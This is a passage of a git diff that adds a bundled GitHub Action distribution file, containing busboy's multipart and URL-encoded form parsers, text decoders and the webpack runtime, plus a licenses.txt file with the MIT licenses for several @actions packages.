+ filename = parsed[i][1] + if (!preservePath) { filename = basename(filename) } + } + } + } else { return skipPart(part) } + + if (header['content-transfer-encoding']) { encoding = header['content-transfer-encoding'][0].toLowerCase() } else { encoding = '7bit' } + + let onData, + onEnd + + if (isPartAFile(fieldname, contype, filename)) { + // file/binary field + if (nfiles === filesLimit) { + if (!boy.hitFilesLimit) { + boy.hitFilesLimit = true + boy.emit('filesLimit') + } + return skipPart(part) + } + + ++nfiles + + if (!boy._events.file) { + self.parser._ignore() + return + } + + ++nends + const file = new 
FileStream(fileOpts) + curFile = file + file.on('end', function () { + --nends + self._pause = false + checkFinished() + if (self._cb && !self._needDrain) { + const cb = self._cb + self._cb = undefined + cb() + } + }) + file._read = function (n) { + if (!self._pause) { return } + self._pause = false + if (self._cb && !self._needDrain) { + const cb = self._cb + self._cb = undefined + cb() + } + } + boy.emit('file', fieldname, file, filename, encoding, contype) + + onData = function (data) { + if ((nsize += data.length) > fileSizeLimit) { + const extralen = fileSizeLimit - nsize + data.length + if (extralen > 0) { file.push(data.slice(0, extralen)) } + file.truncated = true + file.bytesRead = fileSizeLimit + part.removeAllListeners('data') + file.emit('limit') + return + } else if (!file.push(data)) { self._pause = true } + + file.bytesRead = nsize + } + + onEnd = function () { + curFile = undefined + file.push(null) + } + } else { + // non-file field + if (nfields === fieldsLimit) { + if (!boy.hitFieldsLimit) { + boy.hitFieldsLimit = true + boy.emit('fieldsLimit') + } + return skipPart(part) + } + + ++nfields + ++nends + let buffer = '' + let truncated = false + curField = part + + onData = function (data) { + if ((nsize += data.length) > fieldSizeLimit) { + const extralen = (fieldSizeLimit - (nsize - data.length)) + buffer += data.toString('binary', 0, extralen) + truncated = true + part.removeAllListeners('data') + } else { buffer += data.toString('binary') } + } + + onEnd = function () { + curField = undefined + if (buffer.length) { buffer = decodeText(buffer, 'binary', charset) } + boy.emit('field', fieldname, buffer, false, truncated, encoding, contype) + --nends + checkFinished() + } + } + + /* As of node@2efe4ab761666 (v0.10.29+/v0.11.14+), busboy had become + broken. Streams2/streams3 is a huge black box of confusion, but + somehow overriding the sync state seems to fix things again (and still + seems to work for previous node versions). 
+ */ + part._readableState.sync = false + + part.on('data', onData) + part.on('end', onEnd) + }).on('error', function (err) { + if (curFile) { curFile.emit('error', err) } + }) + }).on('error', function (err) { + boy.emit('error', err) + }).on('finish', function () { + finished = true + checkFinished() + }) +} + +Multipart.prototype.write = function (chunk, cb) { + const r = this.parser.write(chunk) + if (r && !this._pause) { + cb() + } else { + this._needDrain = !r + this._cb = cb + } +} + +Multipart.prototype.end = function () { + const self = this + + if (self.parser.writable) { + self.parser.end() + } else if (!self._boy._done) { + process.nextTick(function () { + self._boy._done = true + self._boy.emit('finish') + }) + } +} + +function skipPart (part) { + part.resume() +} + +function FileStream (opts) { + Readable.call(this, opts) + + this.bytesRead = 0 + + this.truncated = false +} + +inherits(FileStream, Readable) + +FileStream.prototype._read = function (n) {} + +module.exports = Multipart + + +/***/ }), + +/***/ 8306: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const Decoder = __nccwpck_require__(7100) +const decodeText = __nccwpck_require__(4619) +const getLimit = __nccwpck_require__(1467) + +const RE_CHARSET = /^charset$/i + +UrlEncoded.detect = /^application\/x-www-form-urlencoded/i +function UrlEncoded (boy, cfg) { + const limits = cfg.limits + const parsedConType = cfg.parsedConType + this.boy = boy + + this.fieldSizeLimit = getLimit(limits, 'fieldSize', 1 * 1024 * 1024) + this.fieldNameSizeLimit = getLimit(limits, 'fieldNameSize', 100) + this.fieldsLimit = getLimit(limits, 'fields', Infinity) + + let charset + for (var i = 0, len = parsedConType.length; i < len; ++i) { // eslint-disable-line no-var + if (Array.isArray(parsedConType[i]) && + RE_CHARSET.test(parsedConType[i][0])) { + charset = parsedConType[i][1].toLowerCase() + break + } + } + + if (charset === undefined) { charset = cfg.defCharset || 
'utf8' } + + this.decoder = new Decoder() + this.charset = charset + this._fields = 0 + this._state = 'key' + this._checkingBytes = true + this._bytesKey = 0 + this._bytesVal = 0 + this._key = '' + this._val = '' + this._keyTrunc = false + this._valTrunc = false + this._hitLimit = false +} + +UrlEncoded.prototype.write = function (data, cb) { + if (this._fields === this.fieldsLimit) { + if (!this.boy.hitFieldsLimit) { + this.boy.hitFieldsLimit = true + this.boy.emit('fieldsLimit') + } + return cb() + } + + let idxeq; let idxamp; let i; let p = 0; const len = data.length + + while (p < len) { + if (this._state === 'key') { + idxeq = idxamp = undefined + for (i = p; i < len; ++i) { + if (!this._checkingBytes) { ++p } + if (data[i] === 0x3D/* = */) { + idxeq = i + break + } else if (data[i] === 0x26/* & */) { + idxamp = i + break + } + if (this._checkingBytes && this._bytesKey === this.fieldNameSizeLimit) { + this._hitLimit = true + break + } else if (this._checkingBytes) { ++this._bytesKey } + } + + if (idxeq !== undefined) { + // key with assignment + if (idxeq > p) { this._key += this.decoder.write(data.toString('binary', p, idxeq)) } + this._state = 'val' + + this._hitLimit = false + this._checkingBytes = true + this._val = '' + this._bytesVal = 0 + this._valTrunc = false + this.decoder.reset() + + p = idxeq + 1 + } else if (idxamp !== undefined) { + // key with no assignment + ++this._fields + let key; const keyTrunc = this._keyTrunc + if (idxamp > p) { key = (this._key += this.decoder.write(data.toString('binary', p, idxamp))) } else { key = this._key } + + this._hitLimit = false + this._checkingBytes = true + this._key = '' + this._bytesKey = 0 + this._keyTrunc = false + this.decoder.reset() + + if (key.length) { + this.boy.emit('field', decodeText(key, 'binary', this.charset), + '', + keyTrunc, + false) + } + + p = idxamp + 1 + if (this._fields === this.fieldsLimit) { return cb() } + } else if (this._hitLimit) { + // we may not have hit the actual limit if 
there are encoded bytes... + if (i > p) { this._key += this.decoder.write(data.toString('binary', p, i)) } + p = i + if ((this._bytesKey = this._key.length) === this.fieldNameSizeLimit) { + // yep, we actually did hit the limit + this._checkingBytes = false + this._keyTrunc = true + } + } else { + if (p < len) { this._key += this.decoder.write(data.toString('binary', p)) } + p = len + } + } else { + idxamp = undefined + for (i = p; i < len; ++i) { + if (!this._checkingBytes) { ++p } + if (data[i] === 0x26/* & */) { + idxamp = i + break + } + if (this._checkingBytes && this._bytesVal === this.fieldSizeLimit) { + this._hitLimit = true + break + } else if (this._checkingBytes) { ++this._bytesVal } + } + + if (idxamp !== undefined) { + ++this._fields + if (idxamp > p) { this._val += this.decoder.write(data.toString('binary', p, idxamp)) } + this.boy.emit('field', decodeText(this._key, 'binary', this.charset), + decodeText(this._val, 'binary', this.charset), + this._keyTrunc, + this._valTrunc) + this._state = 'key' + + this._hitLimit = false + this._checkingBytes = true + this._key = '' + this._bytesKey = 0 + this._keyTrunc = false + this.decoder.reset() + + p = idxamp + 1 + if (this._fields === this.fieldsLimit) { return cb() } + } else if (this._hitLimit) { + // we may not have hit the actual limit if there are encoded bytes... 
+ if (i > p) { this._val += this.decoder.write(data.toString('binary', p, i)) } + p = i + if ((this._val === '' && this.fieldSizeLimit === 0) || + (this._bytesVal = this._val.length) === this.fieldSizeLimit) { + // yep, we actually did hit the limit + this._checkingBytes = false + this._valTrunc = true + } + } else { + if (p < len) { this._val += this.decoder.write(data.toString('binary', p)) } + p = len + } + } + } + cb() +} + +UrlEncoded.prototype.end = function () { + if (this.boy._done) { return } + + if (this._state === 'key' && this._key.length > 0) { + this.boy.emit('field', decodeText(this._key, 'binary', this.charset), + '', + this._keyTrunc, + false) + } else if (this._state === 'val') { + this.boy.emit('field', decodeText(this._key, 'binary', this.charset), + decodeText(this._val, 'binary', this.charset), + this._keyTrunc, + this._valTrunc) + } + this.boy._done = true + this.boy.emit('finish') +} + +module.exports = UrlEncoded + + +/***/ }), + +/***/ 7100: +/***/ ((module) => { + +"use strict"; + + +const RE_PLUS = /\+/g + +const HEX = [ + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, + 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 +] + +function Decoder () { + this.buffer = undefined +} +Decoder.prototype.write = function (str) { + // Replace '+' with ' ' before decoding + str = str.replace(RE_PLUS, ' ') + let res = '' + let i = 0; let p = 0; const len = str.length + for (; i < len; ++i) { + if (this.buffer !== undefined) { + if (!HEX[str.charCodeAt(i)]) { + res += '%' + this.buffer + this.buffer = undefined + --i // retry character + } else { + this.buffer += str[i] + ++p + if (this.buffer.length === 2) { + res += String.fromCharCode(parseInt(this.buffer, 
16)) + this.buffer = undefined + } + } + } else if (str[i] === '%') { + if (i > p) { + res += str.substring(p, i) + p = i + } + this.buffer = '' + ++p + } + } + if (p < len && this.buffer === undefined) { res += str.substring(p) } + return res +} +Decoder.prototype.reset = function () { + this.buffer = undefined +} + +module.exports = Decoder + + +/***/ }), + +/***/ 8647: +/***/ ((module) => { + +"use strict"; + + +module.exports = function basename (path) { + if (typeof path !== 'string') { return '' } + for (var i = path.length - 1; i >= 0; --i) { // eslint-disable-line no-var + switch (path.charCodeAt(i)) { + case 0x2F: // '/' + case 0x5C: // '\' + path = path.slice(i + 1) + return (path === '..' || path === '.' ? '' : path) + } + } + return (path === '..' || path === '.' ? '' : path) +} + + +/***/ }), + +/***/ 4619: +/***/ (function(module) { + +"use strict"; + + +// Node has always utf-8 +const utf8Decoder = new TextDecoder('utf-8') +const textDecoders = new Map([ + ['utf-8', utf8Decoder], + ['utf8', utf8Decoder] +]) + +function getDecoder (charset) { + let lc + while (true) { + switch (charset) { + case 'utf-8': + case 'utf8': + return decoders.utf8 + case 'latin1': + case 'ascii': // TODO: Make these a separate, strict decoder? 
+ case 'us-ascii': + case 'iso-8859-1': + case 'iso8859-1': + case 'iso88591': + case 'iso_8859-1': + case 'windows-1252': + case 'iso_8859-1:1987': + case 'cp1252': + case 'x-cp1252': + return decoders.latin1 + case 'utf16le': + case 'utf-16le': + case 'ucs2': + case 'ucs-2': + return decoders.utf16le + case 'base64': + return decoders.base64 + default: + if (lc === undefined) { + lc = true + charset = charset.toLowerCase() + continue + } + return decoders.other.bind(charset) + } + } +} + +const decoders = { + utf8: (data, sourceEncoding) => { + if (data.length === 0) { + return '' + } + if (typeof data === 'string') { + data = Buffer.from(data, sourceEncoding) + } + return data.utf8Slice(0, data.length) + }, + + latin1: (data, sourceEncoding) => { + if (data.length === 0) { + return '' + } + if (typeof data === 'string') { + return data + } + return data.latin1Slice(0, data.length) + }, + + utf16le: (data, sourceEncoding) => { + if (data.length === 0) { + return '' + } + if (typeof data === 'string') { + data = Buffer.from(data, sourceEncoding) + } + return data.ucs2Slice(0, data.length) + }, + + base64: (data, sourceEncoding) => { + if (data.length === 0) { + return '' + } + if (typeof data === 'string') { + data = Buffer.from(data, sourceEncoding) + } + return data.base64Slice(0, data.length) + }, + + other: (data, sourceEncoding) => { + if (data.length === 0) { + return '' + } + if (typeof data === 'string') { + data = Buffer.from(data, sourceEncoding) + } + + if (textDecoders.has(this.toString())) { + try { + return textDecoders.get(this).decode(data) + } catch (e) { } + } + return typeof data === 'string' + ? 
data + : data.toString() + } +} + +function decodeText (text, sourceEncoding, destEncoding) { + if (text) { + return getDecoder(destEncoding)(text, sourceEncoding) + } + return text +} + +module.exports = decodeText + + +/***/ }), + +/***/ 1467: +/***/ ((module) => { + +"use strict"; + + +module.exports = function getLimit (limits, name, defaultLimit) { + if ( + !limits || + limits[name] === undefined || + limits[name] === null + ) { return defaultLimit } + + if ( + typeof limits[name] !== 'number' || + isNaN(limits[name]) + ) { throw new TypeError('Limit ' + name + ' is not a valid number') } + + return limits[name] +} + + +/***/ }), + +/***/ 1854: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; +/* eslint-disable object-property-newline */ + + +const decodeText = __nccwpck_require__(4619) + +const RE_ENCODED = /%[a-fA-F0-9][a-fA-F0-9]/g + +const EncodedLookup = { + '%00': '\x00', '%01': '\x01', '%02': '\x02', '%03': '\x03', '%04': '\x04', + '%05': '\x05', '%06': '\x06', '%07': '\x07', '%08': '\x08', '%09': '\x09', + '%0a': '\x0a', '%0A': '\x0a', '%0b': '\x0b', '%0B': '\x0b', '%0c': '\x0c', + '%0C': '\x0c', '%0d': '\x0d', '%0D': '\x0d', '%0e': '\x0e', '%0E': '\x0e', + '%0f': '\x0f', '%0F': '\x0f', '%10': '\x10', '%11': '\x11', '%12': '\x12', + '%13': '\x13', '%14': '\x14', '%15': '\x15', '%16': '\x16', '%17': '\x17', + '%18': '\x18', '%19': '\x19', '%1a': '\x1a', '%1A': '\x1a', '%1b': '\x1b', + '%1B': '\x1b', '%1c': '\x1c', '%1C': '\x1c', '%1d': '\x1d', '%1D': '\x1d', + '%1e': '\x1e', '%1E': '\x1e', '%1f': '\x1f', '%1F': '\x1f', '%20': '\x20', + '%21': '\x21', '%22': '\x22', '%23': '\x23', '%24': '\x24', '%25': '\x25', + '%26': '\x26', '%27': '\x27', '%28': '\x28', '%29': '\x29', '%2a': '\x2a', + '%2A': '\x2a', '%2b': '\x2b', '%2B': '\x2b', '%2c': '\x2c', '%2C': '\x2c', + '%2d': '\x2d', '%2D': '\x2d', '%2e': '\x2e', '%2E': '\x2e', '%2f': '\x2f', + '%2F': '\x2f', '%30': '\x30', '%31': '\x31', '%32': '\x32', '%33': '\x33', + 
'%34': '\x34', '%35': '\x35', '%36': '\x36', '%37': '\x37', '%38': '\x38', + '%39': '\x39', '%3a': '\x3a', '%3A': '\x3a', '%3b': '\x3b', '%3B': '\x3b', + '%3c': '\x3c', '%3C': '\x3c', '%3d': '\x3d', '%3D': '\x3d', '%3e': '\x3e', + '%3E': '\x3e', '%3f': '\x3f', '%3F': '\x3f', '%40': '\x40', '%41': '\x41', + '%42': '\x42', '%43': '\x43', '%44': '\x44', '%45': '\x45', '%46': '\x46', + '%47': '\x47', '%48': '\x48', '%49': '\x49', '%4a': '\x4a', '%4A': '\x4a', + '%4b': '\x4b', '%4B': '\x4b', '%4c': '\x4c', '%4C': '\x4c', '%4d': '\x4d', + '%4D': '\x4d', '%4e': '\x4e', '%4E': '\x4e', '%4f': '\x4f', '%4F': '\x4f', + '%50': '\x50', '%51': '\x51', '%52': '\x52', '%53': '\x53', '%54': '\x54', + '%55': '\x55', '%56': '\x56', '%57': '\x57', '%58': '\x58', '%59': '\x59', + '%5a': '\x5a', '%5A': '\x5a', '%5b': '\x5b', '%5B': '\x5b', '%5c': '\x5c', + '%5C': '\x5c', '%5d': '\x5d', '%5D': '\x5d', '%5e': '\x5e', '%5E': '\x5e', + '%5f': '\x5f', '%5F': '\x5f', '%60': '\x60', '%61': '\x61', '%62': '\x62', + '%63': '\x63', '%64': '\x64', '%65': '\x65', '%66': '\x66', '%67': '\x67', + '%68': '\x68', '%69': '\x69', '%6a': '\x6a', '%6A': '\x6a', '%6b': '\x6b', + '%6B': '\x6b', '%6c': '\x6c', '%6C': '\x6c', '%6d': '\x6d', '%6D': '\x6d', + '%6e': '\x6e', '%6E': '\x6e', '%6f': '\x6f', '%6F': '\x6f', '%70': '\x70', + '%71': '\x71', '%72': '\x72', '%73': '\x73', '%74': '\x74', '%75': '\x75', + '%76': '\x76', '%77': '\x77', '%78': '\x78', '%79': '\x79', '%7a': '\x7a', + '%7A': '\x7a', '%7b': '\x7b', '%7B': '\x7b', '%7c': '\x7c', '%7C': '\x7c', + '%7d': '\x7d', '%7D': '\x7d', '%7e': '\x7e', '%7E': '\x7e', '%7f': '\x7f', + '%7F': '\x7f', '%80': '\x80', '%81': '\x81', '%82': '\x82', '%83': '\x83', + '%84': '\x84', '%85': '\x85', '%86': '\x86', '%87': '\x87', '%88': '\x88', + '%89': '\x89', '%8a': '\x8a', '%8A': '\x8a', '%8b': '\x8b', '%8B': '\x8b', + '%8c': '\x8c', '%8C': '\x8c', '%8d': '\x8d', '%8D': '\x8d', '%8e': '\x8e', + '%8E': '\x8e', '%8f': '\x8f', '%8F': '\x8f', '%90': '\x90', '%91': '\x91', 
+ '%92': '\x92', '%93': '\x93', '%94': '\x94', '%95': '\x95', '%96': '\x96', + '%97': '\x97', '%98': '\x98', '%99': '\x99', '%9a': '\x9a', '%9A': '\x9a', + '%9b': '\x9b', '%9B': '\x9b', '%9c': '\x9c', '%9C': '\x9c', '%9d': '\x9d', + '%9D': '\x9d', '%9e': '\x9e', '%9E': '\x9e', '%9f': '\x9f', '%9F': '\x9f', + '%a0': '\xa0', '%A0': '\xa0', '%a1': '\xa1', '%A1': '\xa1', '%a2': '\xa2', + '%A2': '\xa2', '%a3': '\xa3', '%A3': '\xa3', '%a4': '\xa4', '%A4': '\xa4', + '%a5': '\xa5', '%A5': '\xa5', '%a6': '\xa6', '%A6': '\xa6', '%a7': '\xa7', + '%A7': '\xa7', '%a8': '\xa8', '%A8': '\xa8', '%a9': '\xa9', '%A9': '\xa9', + '%aa': '\xaa', '%Aa': '\xaa', '%aA': '\xaa', '%AA': '\xaa', '%ab': '\xab', + '%Ab': '\xab', '%aB': '\xab', '%AB': '\xab', '%ac': '\xac', '%Ac': '\xac', + '%aC': '\xac', '%AC': '\xac', '%ad': '\xad', '%Ad': '\xad', '%aD': '\xad', + '%AD': '\xad', '%ae': '\xae', '%Ae': '\xae', '%aE': '\xae', '%AE': '\xae', + '%af': '\xaf', '%Af': '\xaf', '%aF': '\xaf', '%AF': '\xaf', '%b0': '\xb0', + '%B0': '\xb0', '%b1': '\xb1', '%B1': '\xb1', '%b2': '\xb2', '%B2': '\xb2', + '%b3': '\xb3', '%B3': '\xb3', '%b4': '\xb4', '%B4': '\xb4', '%b5': '\xb5', + '%B5': '\xb5', '%b6': '\xb6', '%B6': '\xb6', '%b7': '\xb7', '%B7': '\xb7', + '%b8': '\xb8', '%B8': '\xb8', '%b9': '\xb9', '%B9': '\xb9', '%ba': '\xba', + '%Ba': '\xba', '%bA': '\xba', '%BA': '\xba', '%bb': '\xbb', '%Bb': '\xbb', + '%bB': '\xbb', '%BB': '\xbb', '%bc': '\xbc', '%Bc': '\xbc', '%bC': '\xbc', + '%BC': '\xbc', '%bd': '\xbd', '%Bd': '\xbd', '%bD': '\xbd', '%BD': '\xbd', + '%be': '\xbe', '%Be': '\xbe', '%bE': '\xbe', '%BE': '\xbe', '%bf': '\xbf', + '%Bf': '\xbf', '%bF': '\xbf', '%BF': '\xbf', '%c0': '\xc0', '%C0': '\xc0', + '%c1': '\xc1', '%C1': '\xc1', '%c2': '\xc2', '%C2': '\xc2', '%c3': '\xc3', + '%C3': '\xc3', '%c4': '\xc4', '%C4': '\xc4', '%c5': '\xc5', '%C5': '\xc5', + '%c6': '\xc6', '%C6': '\xc6', '%c7': '\xc7', '%C7': '\xc7', '%c8': '\xc8', + '%C8': '\xc8', '%c9': '\xc9', '%C9': '\xc9', '%ca': '\xca', '%Ca': 
'\xca', + '%cA': '\xca', '%CA': '\xca', '%cb': '\xcb', '%Cb': '\xcb', '%cB': '\xcb', + '%CB': '\xcb', '%cc': '\xcc', '%Cc': '\xcc', '%cC': '\xcc', '%CC': '\xcc', + '%cd': '\xcd', '%Cd': '\xcd', '%cD': '\xcd', '%CD': '\xcd', '%ce': '\xce', + '%Ce': '\xce', '%cE': '\xce', '%CE': '\xce', '%cf': '\xcf', '%Cf': '\xcf', + '%cF': '\xcf', '%CF': '\xcf', '%d0': '\xd0', '%D0': '\xd0', '%d1': '\xd1', + '%D1': '\xd1', '%d2': '\xd2', '%D2': '\xd2', '%d3': '\xd3', '%D3': '\xd3', + '%d4': '\xd4', '%D4': '\xd4', '%d5': '\xd5', '%D5': '\xd5', '%d6': '\xd6', + '%D6': '\xd6', '%d7': '\xd7', '%D7': '\xd7', '%d8': '\xd8', '%D8': '\xd8', + '%d9': '\xd9', '%D9': '\xd9', '%da': '\xda', '%Da': '\xda', '%dA': '\xda', + '%DA': '\xda', '%db': '\xdb', '%Db': '\xdb', '%dB': '\xdb', '%DB': '\xdb', + '%dc': '\xdc', '%Dc': '\xdc', '%dC': '\xdc', '%DC': '\xdc', '%dd': '\xdd', + '%Dd': '\xdd', '%dD': '\xdd', '%DD': '\xdd', '%de': '\xde', '%De': '\xde', + '%dE': '\xde', '%DE': '\xde', '%df': '\xdf', '%Df': '\xdf', '%dF': '\xdf', + '%DF': '\xdf', '%e0': '\xe0', '%E0': '\xe0', '%e1': '\xe1', '%E1': '\xe1', + '%e2': '\xe2', '%E2': '\xe2', '%e3': '\xe3', '%E3': '\xe3', '%e4': '\xe4', + '%E4': '\xe4', '%e5': '\xe5', '%E5': '\xe5', '%e6': '\xe6', '%E6': '\xe6', + '%e7': '\xe7', '%E7': '\xe7', '%e8': '\xe8', '%E8': '\xe8', '%e9': '\xe9', + '%E9': '\xe9', '%ea': '\xea', '%Ea': '\xea', '%eA': '\xea', '%EA': '\xea', + '%eb': '\xeb', '%Eb': '\xeb', '%eB': '\xeb', '%EB': '\xeb', '%ec': '\xec', + '%Ec': '\xec', '%eC': '\xec', '%EC': '\xec', '%ed': '\xed', '%Ed': '\xed', + '%eD': '\xed', '%ED': '\xed', '%ee': '\xee', '%Ee': '\xee', '%eE': '\xee', + '%EE': '\xee', '%ef': '\xef', '%Ef': '\xef', '%eF': '\xef', '%EF': '\xef', + '%f0': '\xf0', '%F0': '\xf0', '%f1': '\xf1', '%F1': '\xf1', '%f2': '\xf2', + '%F2': '\xf2', '%f3': '\xf3', '%F3': '\xf3', '%f4': '\xf4', '%F4': '\xf4', + '%f5': '\xf5', '%F5': '\xf5', '%f6': '\xf6', '%F6': '\xf6', '%f7': '\xf7', + '%F7': '\xf7', '%f8': '\xf8', '%F8': '\xf8', '%f9': '\xf9', 
'%F9': '\xf9', + '%fa': '\xfa', '%Fa': '\xfa', '%fA': '\xfa', '%FA': '\xfa', '%fb': '\xfb', + '%Fb': '\xfb', '%fB': '\xfb', '%FB': '\xfb', '%fc': '\xfc', '%Fc': '\xfc', + '%fC': '\xfc', '%FC': '\xfc', '%fd': '\xfd', '%Fd': '\xfd', '%fD': '\xfd', + '%FD': '\xfd', '%fe': '\xfe', '%Fe': '\xfe', '%fE': '\xfe', '%FE': '\xfe', + '%ff': '\xff', '%Ff': '\xff', '%fF': '\xff', '%FF': '\xff' +} + +function encodedReplacer (match) { + return EncodedLookup[match] +} + +const STATE_KEY = 0 +const STATE_VALUE = 1 +const STATE_CHARSET = 2 +const STATE_LANG = 3 + +function parseParams (str) { + const res = [] + let state = STATE_KEY + let charset = '' + let inquote = false + let escaping = false + let p = 0 + let tmp = '' + const len = str.length + + for (var i = 0; i < len; ++i) { // eslint-disable-line no-var + const char = str[i] + if (char === '\\' && inquote) { + if (escaping) { escaping = false } else { + escaping = true + continue + } + } else if (char === '"') { + if (!escaping) { + if (inquote) { + inquote = false + state = STATE_KEY + } else { inquote = true } + continue + } else { escaping = false } + } else { + if (escaping && inquote) { tmp += '\\' } + escaping = false + if ((state === STATE_CHARSET || state === STATE_LANG) && char === "'") { + if (state === STATE_CHARSET) { + state = STATE_LANG + charset = tmp.substring(1) + } else { state = STATE_VALUE } + tmp = '' + continue + } else if (state === STATE_KEY && + (char === '*' || char === '=') && + res.length) { + state = char === '*' + ? 
STATE_CHARSET + : STATE_VALUE + res[p] = [tmp, undefined] + tmp = '' + continue + } else if (!inquote && char === ';') { + state = STATE_KEY + if (charset) { + if (tmp.length) { + tmp = decodeText(tmp.replace(RE_ENCODED, encodedReplacer), + 'binary', + charset) + } + charset = '' + } else if (tmp.length) { + tmp = decodeText(tmp, 'binary', 'utf8') + } + if (res[p] === undefined) { res[p] = tmp } else { res[p][1] = tmp } + tmp = '' + ++p + continue + } else if (!inquote && (char === ' ' || char === '\t')) { continue } + } + tmp += char + } + if (charset && tmp.length) { + tmp = decodeText(tmp.replace(RE_ENCODED, encodedReplacer), + 'binary', + charset) + } else if (tmp) { + tmp = decodeText(tmp, 'binary', 'utf8') + } + + if (res[p] === undefined) { + if (tmp) { res[p] = tmp } + } else { res[p][1] = tmp } + + return res +} + +module.exports = parseParams + + +/***/ }) + +/******/ }); +/************************************************************************/ +/******/ // The module cache +/******/ var __webpack_module_cache__ = {}; +/******/ +/******/ // The require function +/******/ function __nccwpck_require__(moduleId) { +/******/ // Check if module is in cache +/******/ var cachedModule = __webpack_module_cache__[moduleId]; +/******/ if (cachedModule !== undefined) { +/******/ return cachedModule.exports; +/******/ } +/******/ // Create a new module (and put it into the cache) +/******/ var module = __webpack_module_cache__[moduleId] = { +/******/ // no module.id needed +/******/ // no module.loaded needed +/******/ exports: {} +/******/ }; +/******/ +/******/ // Execute the module function +/******/ var threw = true; +/******/ try { +/******/ __webpack_modules__[moduleId].call(module.exports, module, module.exports, __nccwpck_require__); +/******/ threw = false; +/******/ } finally { +/******/ if(threw) delete __webpack_module_cache__[moduleId]; +/******/ } +/******/ +/******/ // Return the exports of the module +/******/ return module.exports; +/******/ } 
+/******/ +/************************************************************************/ +/******/ /* webpack/runtime/compat */ +/******/ +/******/ if (typeof __nccwpck_require__ !== 'undefined') __nccwpck_require__.ab = __dirname + "/"; +/******/ +/************************************************************************/ +/******/ +/******/ // startup +/******/ // Load entry module and return exports +/******/ // This entry module is referenced by other modules so it can't be inlined +/******/ var __webpack_exports__ = __nccwpck_require__(6144); +/******/ module.exports = __webpack_exports__; +/******/ +/******/ })() +; \ No newline at end of file diff --git a/.github/action/dist/licenses.txt b/.github/action/dist/licenses.txt new file mode 100644 index 000000000000..cd36a2d85eff --- /dev/null +++ b/.github/action/dist/licenses.txt 
@@ -0,0 +1,175 @@ +@actions/core +MIT +The MIT License (MIT) + +Copyright 2019 GitHub + +Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. + +@actions/exec +MIT +The MIT License (MIT) + +Copyright 2019 GitHub + +Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. + +@actions/http-client +MIT +Actions Http Client for Node.js + +Copyright (c) GitHub, Inc. + +All rights reserved. + +MIT License + +Permission is hereby granted, free of charge, to any person obtaining a copy of this software and +associated documentation files (the "Software"), to deal in the Software without restriction, +including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, +and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, +subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT +LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN +NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, +WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE +SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. 
